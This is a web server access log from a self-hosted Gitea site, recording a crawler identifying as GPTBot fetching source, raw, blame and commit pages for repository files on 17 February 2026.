[Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/my_database.db" +[17/Feb/2026:14:11:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" +[17/Feb/2026:14:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" +[17/Feb/2026:14:12:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 10483] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" +[17/Feb/2026:14:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 11994] [Gzip 5.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" +[17/Feb/2026:14:12:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" +[17/Feb/2026:14:12:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" +[17/Feb/2026:14:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23044] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:12:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14323] [Gzip 27.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/my_database.db" +[17/Feb/2026:14:12:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23045] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10859] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" +[17/Feb/2026:14:12:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" +[17/Feb/2026:14:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/my_database.db" +[17/Feb/2026:14:12:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 10808] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/my_database.db" +[17/Feb/2026:14:12:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10860] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" +[17/Feb/2026:14:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:12:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 12542] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" +[17/Feb/2026:14:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:12:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build_exe.py" +[17/Feb/2026:14:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" +[17/Feb/2026:14:12:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" +[17/Feb/2026:14:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/my_database.db" +[17/Feb/2026:14:12:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" [Client 74.7.227.38] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/user_assets.csv" +[17/Feb/2026:14:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" +[17/Feb/2026:14:12:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 9462] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" +[17/Feb/2026:14:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" +[17/Feb/2026:14:12:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" +[17/Feb/2026:14:12:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" +[17/Feb/2026:14:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 11962] [Gzip 5.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" +[17/Feb/2026:14:12:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14349] [Gzip 27.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/my_database.db" +[17/Feb/2026:14:12:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" [Client 74.7.227.38] [Length 30468064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe" +[17/Feb/2026:14:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 9867] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" +[17/Feb/2026:14:12:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23043] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/Gitea_Manual.md" +[17/Feb/2026:14:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/my_database.db" +[17/Feb/2026:14:12:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 74.7.227.38] [Length 16073] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:14:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 74.7.227.38] [Length 12950] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:14:12:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 74.7.227.38] [Length 16044] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:14:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" [Client 74.7.227.38] [Length 12950] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:14:12:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12499] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 12510] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:12:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" [Client 74.7.227.38] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good2" +[17/Feb/2026:14:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" +[17/Feb/2026:14:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile?display=rendered" [Client 74.7.227.38] [Length 10886] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" +[17/Feb/2026:14:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile?display=source" [Client 74.7.227.38] [Length 11594] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" +[17/Feb/2026:14:12:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/start.sh" +[17/Feb/2026:14:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 74.7.227.38] [Length 10142] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" +[17/Feb/2026:14:12:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/update_status.py" +[17/Feb/2026:14:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" [Client 74.7.227.38] [Length 10115] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/mail_contact.py" +[17/Feb/2026:14:12:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" +[17/Feb/2026:14:12:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10192] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" [Client 74.7.227.38] [Length 10399] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/warn-PostgresWatchdog.txt" +[17/Feb/2026:14:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/update_status.py" 